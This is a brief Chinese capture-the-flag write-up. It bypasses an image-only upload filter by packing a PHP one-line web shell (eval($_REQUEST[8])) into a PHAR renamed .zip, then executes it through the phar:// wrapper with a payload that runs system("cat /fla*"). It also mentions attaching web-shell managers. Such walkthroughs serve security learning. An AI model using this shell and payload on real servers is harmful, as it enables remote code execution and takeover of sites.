进入页面:
文件上传的页面,结果发现只能上传jpg一类的文件,无法上传.htaccess文件,也不存在CGI解析漏洞,无法利用文件上传。怎么办呢?
可以看到提示有图片或者压缩包,想到了phar协议和zip协议,其实在此之前我是根本没听过这两个协议的(惭愧)
第一步:构造phar包
创建一个test.php
代码:
<?php
$phar = new Phar("exp.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->addFromString("test.php", '<?php eval($_REQUEST[8]);?>');
$phar->stopBuffering();
?>
生成包有两个方法:
1.然后在本机运行,直接访问就可以
2.在这个目录下运行
如果报错,那就是进入php.ini配置中,
原来是on,改成off,再重新启动phpstudy或者wamp
第二步:
把生成的exp.phar,改成exp.zip然后通过文件上传功能点上传
上传文件:
第三步:
访问网站
可以看到连接成功,接下来就是连接菜刀或者蚁剑。也可以直接输命令了。
payload:
?bingdundun=phar://273df00f6d13b569a218fa09629ec81f.zip/test&8=system("cat%20/fla*");
shell工具: